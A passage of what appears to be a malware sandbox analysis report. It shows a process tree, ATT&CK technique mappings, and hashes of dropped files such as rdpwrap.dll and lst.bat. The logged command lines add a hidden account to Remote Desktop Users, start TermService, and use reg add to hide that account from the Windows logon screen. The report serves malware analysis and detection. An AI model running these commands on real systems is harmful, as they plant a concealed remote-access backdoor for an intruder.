C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote desktop users" SysWOW64 /add
5⤵
PID:2044

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1952

C:\Windows\SysWOW64\net.exe
net localgroup "Remote desktop users" "Admin" /add
4⤵
PID:1028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote desktop users" "Admin" /add
5⤵
PID:1008

C:\Windows\SysWOW64\net.exe
net start "TermService"
4⤵
PID:2012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "TermService"
5⤵
PID:1740

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Windows\system32\taskeng.exe
taskeng.exe {04D56997-B61C-41CA-AD2A-11402AF92322} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]
1⤵
PID:1744

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs"
2⤵
PID:1124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat
3⤵
PID:1668

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SysWOW64 /t REG_DWORD /d 0 /f
4⤵
PID:560

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\Services\rdpwrap.dll
MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
C:\Program Files\Common Files\Services\rdpwrap.ini
MD5
aada14668a752e946ec217cd05914107

SHA1
712bfebbe7cea17865cb5eff8ea227d1dd930e4d

SHA256
866c1ae68b4f1e77dc894289895bf83036028ab6dc2aefcb310d3f80fa705589

SHA512
f1c8485defdc8f1acb9246ac26b0e0425ddd268fbc22a8ffc894d157273841888d617e10981304b2810cd615dd21e9ebaa76c158ad49c8077397f3fc5da8cfbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat
MD5
296ddd4ff315bc654ef9a115e6d00927

SHA1
27a1a3ae50c560a7635b826b77b2bea3c649d11a

SHA256
76458f40126c21a890e97da5bd20b219c2eb83cc4171d958335d5fcc22f3860b

SHA512
1a793e98413253f59b36d3e13c90821645e4f0b3d9c81959cbcd3cfd09a60298b974ea7cc77a420668f35766b17766e8b07a68189b40aabbd4adde26b81a4574

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs
MD5
4c9bf0719250bbbf5a44ad421e0c00f4

SHA1
dd686bfa711732d30611b0bdcc1f270ba3828180

SHA256
12bc4a0eae0555b0850cb271bae5cc660bf7551750e3c7ae9a0fb7843e0d302f

SHA512
d5dce8489a39c0e44c6f77f154f0caa3ce51ffe345d0862ccdf594711ea2b45c4aa5fe61a4a50ba5de2612fa7752971186281426f8a841d8e03b24cb895b85d0

Download Submit
C:\Users\Public\iv3yydjq.exe
MD5
b28986509331c265eefa7c7300fa0227

SHA1
582fe31db734e32946fd4ea52fe4bcc12864f120

SHA256
2075b6cc6c3d8b4c0540208f6ec590c1d8b3d74d9294a17fb1790afd5222b161

SHA512
4369599d07437cb3d9e6ab9cf54beead697aafc277c7c243b2d8fdd59e9844ca58be8a1aae43d22a9588f1c65be0d47f2ab93b81fde90aeab1b5a438f1a3b6d6

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Public\iv3yydjq.exe
MD5
b28986509331c265eefa7c7300fa0227

SHA1
582fe31db734e32946fd4ea52fe4bcc12864f120

SHA256
2075b6cc6c3d8b4c0540208f6ec590c1d8b3d74d9294a17fb1790afd5222b161

SHA512
4369599d07437cb3d9e6ab9cf54beead697aafc277c7c243b2d8fdd59e9844ca58be8a1aae43d22a9588f1c65be0d47f2ab93b81fde90aeab1b5a438f1a3b6d6

Download Submit
\??\c:\Users\Public\qpcxh2bd.inf
MD5
1cdc414cdbc6b9ffd3c28c8d9057424a

SHA1
dc541c5244f9b09d63a250ca11ac36428b902437

SHA256
81e1cc88e49fef04a6b8d8172e1cde4e9b014240a9bdc8bde66898c1b7424ee4

SHA512
a1518a8ec921e105093313d862b3e3ffe0bc2a2ff63a59c8c67082b5b8cdf931b0488d72c857ac551e9d49f4baaf0dd4e9278e346b6be8b7b7b0c2fb0a9e43a9

Download Submit
memory/744-60-0x0000000000D86000-0x0000000000DA5000-memory.dmp

Filesize
124KB

Download
memory/744-55-0x000007FEF57CE000-0x000007FEF57CF000-memory.dmp

Filesize
4KB

Download
memory/744-57-0x000007FEF2920000-0x000007FEF39B6000-memory.dmp

Filesize
16.6MB

Download
memory/744-56-0x0000000000D80000-0x0000000000D82000-memory.dmp

Filesize
8KB

Download
memory/1288-59-0x000007FEFBEB1000-0x000007FEFBEB3000-memory.dmp

Filesize
8KB

Download
memory/1544-65-0x0000000075321000-0x0000000075323000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads